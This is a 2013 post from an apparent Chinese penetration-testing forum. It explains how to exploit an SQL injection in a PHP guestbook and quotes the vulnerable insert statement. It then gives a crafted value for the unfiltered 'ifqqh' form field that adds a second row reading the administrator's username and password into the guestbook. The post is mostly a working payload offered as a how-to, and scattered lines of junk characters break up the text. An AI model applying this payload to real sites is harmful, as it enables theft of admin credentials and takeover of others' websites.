中国网络渗透测试联盟
标题:
php留言本注入得帐号密码
[打印本页]
作者:
admin
时间:
2013-2-19 08:10
标题:
php留言本注入得帐号密码
留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
. _& @; ~. w6 t6 S
9 x {' Z4 \9 h- H/ G8 j
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
1 a( U- e/ [' O( i! I' T, Q
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
4 T1 [; E/ g1 \: b$ ?0 o" X7 }
2 X& ^3 M* _- ?" }1 e
提交的时候把ifqqh的值改一下。变成
! p$ l, ]1 }2 i7 j# C6 O
7 q4 |1 u7 x% u
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
+ s& J; l! I. O2 a0 u+ e
0 s |( l6 O- A& f1 ~* X! A4 f
这样SQL插入语句就变了.
7 E) t# E" A# y2 d0 a
1 k6 m& G. _8 w3 D4 N# w
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
: X6 {, o( i9 ~' y; q
1 O$ E# K! S5 \7 w# m& m+ I( a1 _
构造了另外一句SQL。并且把帐号密码读出来。
( q8 d4 e: e0 s" v' M
# P X. v) \0 Y" ^; |& E
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2